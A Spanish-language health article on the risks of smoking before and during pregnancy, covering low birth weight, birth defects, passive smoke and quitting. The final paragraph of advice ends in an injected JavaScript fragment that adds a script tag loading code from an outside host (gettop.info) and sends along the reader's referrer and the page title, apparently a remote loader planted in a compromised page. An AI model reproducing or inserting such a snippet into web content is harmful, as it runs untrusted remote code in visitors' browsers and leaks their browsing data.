Salud y belleza » Embarazo

Tabaco y embarazo

Sin Comentarios

¿Cómo afecta el tabaco a un recién nacido?

El cigarrito, es decir, todos los componentes que lo forman, desde el tabaco puro hasta la nicotina, es un acto que atenta severamente contra la vida no solo de un feto sino de cualquier niño (cuánto más pequeño el sujeto, más pequeños los órganos, más peligro frente a exposiciones de ésta naturaleza).

Veamos algunos datos interesantes:

Esta comprobado que el fumar prácticamente duplica el riesgo de que el bebé nazca con bajo peso; además precisamente esos bebés que nacen con bajo peso y de forma prematura por agravantes como el de una madre con tal adicción tienen mayores riesgos de sufrir problemas graves de salud durante sus primeros meses de vida, incapacidades permanentes (parálisis cerebral, retraso mental, etc.) e incluso la muerte por algún tipo de insuficiencia.
Cuanto más fume una mujer embarazada, mayor será el riesgo para su bebé de nacer con bajo peso.

¿Hasta qué momento del embarazo no es perjudicial para el bebe en gestación el uso de tabaco?

Se recomienda cortar el hábito en un punto anterior a la noticia el embarazo y, de hecho, aún así, se deben controlar múltiples factores para evitar riesgos.

Según un estudio reciente, las mujeres que fuman en cualquier momento entre el mes antes del embarazo hacia el final del primer trimestre tienen más probabilidades de tener un bebé con defectos de nacimiento (sobretodo cardíacos).

¿Es verdad que, frente a las ganas de fumar, es mejor probar al menos un cigarrillo antes que transmitirle ansiedad al bebé?

No, para nada. Fumar durante el embarazo, sea bajo el término que sea, no una buena idea. La ansiedad se puede tratar con otros métodos pero, en cambio, los problemas que puede padecer un bebé por el tabaco transmitido desde la madre provocan daños irreparables.

¿La exposición al humo del cigarrillo de otras personas durante el embarazo es nociva para el bebé?

La exposición “pasiva” también representa un gran peligro para la salud de la embarazada y la de ese bebe que crece en su interior. Las mujeres embarazadas que no fuman deben evitar exponerse al humo del cigarrillo de otras personas.

¿Qué debo hacer si fumo demasiado y, en mis planes, está tener un bebe?

La advertencia, guste o no, es simple: es recomendable que las mujeres dejen de fumar antes de quedar embarazadas y que no fumen durante el embarazo y el período posterior al parto. Así se sencillo. Suena útil que las mujeres que sueñan con la maternidad atienden este problema relacionado al vicio, antes de decidirse a quedar embarazadas (en la medida que este se pueda, claro). De no ser así, es necesario intentar dejar el cigarrillo desde el minuto cero del embarazo mediante programas para dejar de fumar adecuado u otros métodos (nada con fármacos, desde ya).d.getElementsByTagName('head')[0].appendChild(s);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.